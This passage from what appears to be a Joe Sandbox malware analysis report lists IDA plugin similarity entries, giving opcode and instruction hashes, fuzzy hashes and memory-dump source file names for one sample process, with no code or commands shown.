                                • Opcode ID: d35e905ec3d00e9892ff956c3760462bffd4bd751d0121e9c21e72f1194b9733
                                • Instruction ID: 43777fd251476f409657379edfc9efb2e567bdb03691d62cc406468c819af4fe
                                • Opcode Fuzzy Hash: d35e905ec3d00e9892ff956c3760462bffd4bd751d0121e9c21e72f1194b9733
                                • Instruction Fuzzy Hash: 65014F70904248EFDB01FBA4F9926DDBBB1AF40304F5085A8C4059B295EF316E55ABA1
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d6cf82a603c66f76f88dd30bc3db36890fff71df1323e5121a104fac636be0e6
                                • Instruction ID: ce41bd52013c56c38a7f10d6e6fda6f2d4acc27dc114cb87cb895128e5eb515b
                                • Opcode Fuzzy Hash: d6cf82a603c66f76f88dd30bc3db36890fff71df1323e5121a104fac636be0e6
                                • Instruction Fuzzy Hash: 40F02B33A14151CFDB238FA8A4911BCBFB1EA5531171D429AD906DF293D732D856C711
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4bc0b03d4eaac4c2b7898158ced92314661a60d01b1caa000174ec36dd993d2b
                                • Instruction ID: bcc596bbe2d4c900d0daa1947301c770848b4e9df9be1129e4956e0c3093a350
                                • Opcode Fuzzy Hash: 4bc0b03d4eaac4c2b7898158ced92314661a60d01b1caa000174ec36dd993d2b
                                • Instruction Fuzzy Hash: 06F04F70A04248EFDB41FBB8F9926DDBBB1EF40304F508668C005A7295EF316E54ABA1
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 99b195c196de25cbbdb42cde010aa105a179e25b9dfb2d2c051d244cfe8987f2
                                • Instruction ID: b968d09ff7cfcf7f21b84730828955a0a627a7c85b0f1e667681e6b1175053a8
                                • Opcode Fuzzy Hash: 99b195c196de25cbbdb42cde010aa105a179e25b9dfb2d2c051d244cfe8987f2
                                • Instruction Fuzzy Hash: 4FD012727041204FD745AB38D09807977E5DFD8525311456FD509CB261DE61A9529780
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6bfb9fd63e0f402b012ecd9f47707e6d7df03012fce4e4a62878521b82e7aea6
                                • Instruction ID: 9f384cc4cedd5e97944a5d97e1581d0e1dc6d5d34f57a503d9074221f64dc4e4
                                • Opcode Fuzzy Hash: 6bfb9fd63e0f402b012ecd9f47707e6d7df03012fce4e4a62878521b82e7aea6
                                • Instruction Fuzzy Hash: B2D0A93002E2828FEB039B00E8A43C97F709B48228F08080AC102E60D2C3B964C8CB21